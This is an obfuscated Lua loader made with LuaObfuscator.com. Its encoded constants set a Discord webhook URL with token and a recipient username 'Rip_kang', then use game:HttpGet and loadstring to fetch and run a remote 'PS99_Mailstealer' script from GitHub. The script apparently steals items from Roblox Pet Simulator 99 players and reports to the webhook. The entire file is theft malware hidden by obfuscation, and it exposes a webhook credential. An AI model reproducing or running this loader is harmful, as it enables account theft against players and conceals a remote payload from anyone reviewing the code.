--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v89=v5(v81,v19);v19=nil;return v89;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=0 + 0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((879 -(277 + 5 + 595))^(v32-(2 -1))))%((2 + 0)^(((v33-1) -(v32-(1 -0))) + (2 -(1 + 0)))) ;return v83-(v83%(620 -(555 + 64))) ;end end else local v84=(933 -((1814 -(892 + 65)) + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and ((2213 -1285) -(214 + (1317 -604)))) or (117 -(32 + 85)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(351 -(87 + 263))) then return (v37 * (436 -(67 + 84 + 29))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;v35=1;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(3 -(2 + 0))) then return (v42 * (16778168 -((1054 -252) + 150))) + (v41 * (176444 -110908)) + (v40 * 256) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (1001 -(915 + 82)) ;v38=2 -1 ;end end end local function v24() local v43=v23();local v44=v23();local v45=439 -(145 + 293) ;local v46=(v20(v44,1188 -(1069 + 118) ,450 -(44 + 386) ) * ((4 -(9 -7))^(5 + 6 + 21))) + v43 ;local v47=v20(v44,45 -24 ,31);local v48=((v20(v44,6 + (89 -63) )==(1139 -(116 + 1022))) and  -(1 -0)) or (1 + 0) ;if (v47==(791 -((1448 -(1020 + 60)) + 423))) then if (v46==(0 -(1747 -(760 + 987)))) then return v48 * (18 -(10 + 8)) ;else v47=3 -2 ;v45=0 -0 ;end elseif (v47==(2489 -((1839 -(630 + 793)) + 26))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/((887 -((884 -623) + 624))^((2004 -(1789 + 124)) -39)))) ;end local function v25(v49) local v50=0 -(0 + 0) ;local v51;local v52;while true do if (v50==(767 -(745 + 21))) then v51=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;v50=1 + 1 ;end if (v50==2) then v52={};for v90=2 -1 , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=11 -8 ;end if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + (0 -0))) then return "";end end v50=1 + 0 ;end if (v50==((1072 -(9 + 5)) -(87 + 968))) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==1) then v56=nil;v57=nil;v53=2 + 0 ;end if (v53~=(338 -(144 + 192))) then else local v87=1500 -(1408 + 92) ;while true do if (v87==(217 -(42 + 174))) then v53=1089 -(461 + 625) ;break;end if (v87==(1288 -(993 + 295))) then v58=nil;v59=nil;v87=1 + 0 ;end end end if (0~=v53) then else local v88=0 + 0 ;while true do if (v88==(1172 -(418 + 753))) then v53=1 + 0 ;break;end if ((1504 -(363 + 1141))~=v88) then else v54=0 + 0 ;v55=nil;v88=1 + 0 ;end end end if (v53~=3) then else v60=nil;while true do local v92=0 + 0 ;while true do if (v92~=(1 + 0)) then else if (0==v54) then local v99=0;while true do if (v99==(530 -(406 + 123))) then v57={};v54=2 -1 ;break;end if (v99~=(1769 -(1749 + 20))) then else v55={};v56={};v99=1 + 0 ;end end end if (v54~=(1324 -(1249 + 73))) then else for v102=1 + 0 ,v59 do local v103=1145 -(466 + 679) ;local v104;local v105;local v106;while true do if (v103~=(1 + 0)) then else v106=nil;while true do if (v104==(0 -0)) then local v162=0 -0 ;local v163;while true do if ((1900 -(106 + 1794))~=v162) then else v163=0 + 0 ;while true do if ((1 + 0)~=v163) then else v104=2 -1 ;break;end if (0==v163) then local v175=0 + 0 ;while true do if (v175==0) then v105=v21();v106=nil;v175=1;end if (v175==(2 -1)) then v163=1662 -(1477 + 184) ;break;end end end end break;end end end if (v104~=(1 -0)) then else if (v105==(2 -1)) then v106=v21()~=(114 -(4 + 110)) ;elseif (v105==(2 + 0)) then v106=v24();elseif (v105~=3) then else v106=v25();end v60[v102]=v106;break;end end break;end if (v103~=0) then else v104=584 -(57 + 527) ;v105=nil;v103=1;end end end v58[3]=v21();for v107=857 -(564 + 292) ,v23() do local v108=0;local v109;while true do if (v108~=(1427 -(41 + 1386))) then else v109=v21();if (v20(v109,104 -(17 + 86) ,1 + 0 )==(0 -0)) then local v137=0 -0 ;local v138;local v139;local v140;local v141;local v142;local v143;while true do if (2~=v137) then else v142=nil;v143=nil;v137=3;end if (v137==(307 -(244 + 60))) then while true do if (v138~=(5 -3)) then else v143=nil;while true do if ((167 -(122 + 44))==v139) then local v176=0 -0 ;local v177;while true do if (v176~=(0 -0)) then else v177=0 + 0 ;while true do if (v177~=0) then else local v188=0 + 0 ;while true do if (v188==(1126 -(936 + 189))) then v177=1;break;end if (v188~=(0 + 0)) then else v142=nil;v143=nil;v188=1;end end end if (v177~=(1614 -(1565 + 48))) then else v139=2;break;end end break;end end end if (v139~=(1 + 1)) then else while true do if (v140~=(2 + 0)) then else local v179=0;while true do if ((1 -0)~=v179) then else v140=270 -(176 + 91) ;break;end if ((0 -0)==v179) then local v189=0 -0 ;while true do if (v189==1) then v179=66 -(30 + 35) ;break;end if (v189~=0) then else if (v20(v142,1 + 0 ,1 + 0 )==(3 -2)) then v143[1259 -(1043 + 214) ]=v60[v143[2]];end if (v20(v142,7 -5 ,1214 -(323 + 889) )~=(3 -2)) then else v143[3]=v60[v143[3]];end v189=1019 -(697 + 321) ;end end end end end if ((7 -4)~=v140) then else if (v20(v142,583 -(361 + 219) ,323 -(53 + 267) )==(1 + 0)) then v143[4]=v60[v143[8 -4 ]];end v55[v107]=v143;break;end if (v140~=(414 -(15 + 398))) then else local v181=0;local v182;while true do if (v181==(982 -(18 + 964))) then v182=0;while true do if (v182==(0 -0)) then local v190=0 -0 ;while true do if (v190~=(1227 -(322 + 905))) then else v143={v22(),v22(),nil,nil};if (v141==(0 + 0)) then local v197=872 -(826 + 46) ;local v198;local v199;while true do if (v197==(948 -(245 + 702))) then while true do if (v198~=(0 + 0)) then else v199=0;while true do if (v199==(850 -(20 + 830))) then v143[3 + 0 ]=v22();v143[130 -(116 + 10) ]=v22();break;end end break;end end break;end if (0~=v197) then else v198=0 -0 ;v199=nil;v197=1 + 0 ;end end elseif (v141==1) then v143[741 -(542 + 196) ]=v23();elseif (v141==(2 + 0)) then v143[6 -3 ]=v23() -((1 + 1)^(1221 -(902 + 303))) ;elseif (v141~=3) then else local v203=0 -0 ;while true do if (v203~=(0 + 0)) then else v143[2 + 1 ]=v23() -(2^(2 + 14)) ;v143[10 -6 ]=v22();break;end end end v190=215 -(22 + 192) ;end if (v190==(2 -1)) then v182=1464 -(1404 + 59) ;break;end end end if (v182==1) then v140=2;break;end end break;end end end if (v140~=(1551 -(1126 + 425))) then else local v183=405 -(118 + 287) ;local v184;while true do if (v183~=(0 -0)) then else v184=0;while true do if (v184==(1121 -(118 + 1003))) then local v191=0 -0 ;local v192;while true do if (v191~=(562 -(334 + 228))) then else v192=0;while true do if (v192==(378 -(142 + 235))) then v184=1;break;end if (v192~=(0 -0)) then else local v200=0;while true do if (1~=v200) then else v192=1 + 0 ;break;end if (v200~=(0 -0)) then else v141=v20(v109,979 -(553 + 424) ,3);v142=v20(v109,4,6);v200=1 -0 ;end end end end break;end end end if (v184~=(1 + 0)) then else v140=1 + 0 ;break;end end break;end end end end break;end if (v139~=(0 + 0)) then else local v178=0 + 0 ;while true do if (v178~=(1 + 0)) then else v139=1 + 0 ;break;end if (v178~=(0 + 0)) then else local v185=0 + 0 ;while true do if (v185~=(0 -0)) then else v140=0 -0 ;v141=nil;v185=2 -1 ;end if (v185~=(1 + 0)) then else v178=4 -3 ;break;end end end end end end break;end if (v138~=(0 + 0)) then else v139=0 -0 ;v140=nil;v138=754 -(239 + 514) ;end if (v138==(1 + 0)) then v141=nil;v142=nil;v138=767 -(574 + 191) ;end end break;end if ((0 + 0)==v137) then v138=0 -0 ;v139=nil;v137=1330 -(797 + 532) ;end if (v137~=1) then else v140=nil;v141=nil;v137=2;end end end break;end end end v54=3 + 0 ;end break;end if (v92==0) then if (v54==(1 + 0)) then local v101=0 + 0 ;while true do if (v101==(126 -(55 + 71))) then local v112=0 -0 ;while true do if (v112==(2 -1)) then v101=2 -1 ;break;end if (v112==0) then v58={v55,v56,nil,v57};v59=v23();v112=1131 -(369 + 761) ;end end end if (v101~=(1 + 0)) then else v60={};v54=2 -0 ;break;end end end if (v54~=(5 -2)) then else for v110=1 -0 ,v23() do v56[v110-(1 + 0) ]=v28();end return v58;end v92=239 -(64 + 174) ;end end end break;end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v86=0;while true do if (v86==0) then v79=v67[v71];v80=v79[1];v86=1;end if (v86==1) then if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then local v113=v79[2];local v114,v115=v70(v77[v113](v13(v77,v113 + 1 ,v79[3])));v72=(v115 + v113) -1 ;local v116=0;for v132=v113,v72 do local v133=0;while true do if (v133==0) then v116=v116 + 1 ;v77[v132]=v114[v116];break;end end end else local v117=0;local v118;local v119;while true do if (v117==0) then v118=v79[2];v119=v77[v79[3]];v117=1;end if (v117==1) then v77[v118 + 1 ]=v119;v77[v118]=v119[v79[4]];break;end end end elseif (v80<=2) then v63[v79[3]]=v77[v79[2]];elseif (v80>3) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else do return;end end elseif (v80<=7) then if (v80<=5) then v77[v79[2]]=v63[v79[3]];elseif (v80==6) then v77[v79[2]]=v63[v79[3]];else v63[v79[3]]=v77[v79[2]];end elseif (v80<=8) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==9) then local v149=v79[2];v77[v149]=v77[v149](v13(v77,v149 + 1 ,v72));else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=15) then if (v80<=12) then if (v80==11) then v71=v79[3];else local v125=v79[2];local v126,v127=v70(v77[v125](v13(v77,v125 + 1 ,v79[3])));v72=(v127 + v125) -1 ;local v128=0;for v134=v125,v72 do v128=v128 + 1 ;v77[v134]=v126[v128];end end elseif (v80<=13) then v71=v79[3];elseif (v80>14) then local v152=v79[2];local v153=v77[v79[3]];v77[v152 + 1 ]=v153;v77[v152]=v153[v79[4]];else v77[v79[2]]=v79[3];end elseif (v80<=18) then if (v80<=16) then do return;end elseif (v80==17) then v77[v79[2]]=v79[3]~=0 ;else local v160=0;local v161;while true do if (v160==0) then v161=v79[2];v77[v161]=v77[v161](v13(v77,v161 + 1 ,v72));break;end end end elseif (v80<=19) then v77[v79[2]]=v79[3];elseif (v80>20) then v77[v79[2]]();else v77[v79[2]]();end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313233343035323933313933353031302O38372F6F4F36526A327730466E44384F47506D6276635976454E65454F33677A59343039417A49505A3532676F6E6B4947722O3135646935654B7036394B32594449387056486D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692O75502F50532O395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C756103083O00557365726E616D6503083O005269705F6B616E67030A3O004C6F61645363722O656E00163O00120E3O00013O0026083O000D0001000200040D3O000D000100120E000100043O001202000100033O001206000100053O001206000200063O00200100020002000700120E000400084O000C000200044O001200013O00022O001400010001000100040D3O001500010026083O00010001000100040D3O0001000100120E0001000A3O001202000100094O0011000100013O0012020001000B3O00120E3O00023O00040D3O000100012O00103O00017O00",v9(),...);